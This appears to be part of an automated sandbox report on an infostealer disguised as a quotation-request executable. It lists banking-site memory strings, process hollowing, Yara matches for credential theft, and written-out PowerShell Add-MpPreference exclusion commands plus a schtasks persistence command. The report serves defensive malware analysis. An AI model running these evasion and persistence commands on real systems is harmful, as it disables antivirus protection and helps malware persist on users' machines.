                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.0000000004440000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DB9548 LdrInitializeThunk,14_2_06DB9548
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe"
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeMemory written: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeMemory written: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp2F66.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess created: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp42C0.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess created: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeQueries volume information: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeQueries volume information: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeQueries volume information: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeQueries volume information: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 5268, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: jnqeRRexnD.exe PID: 6448, type: MEMORYSTR
                Source: Yara matchFile source: 14.2.jnqeRRexnD.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE
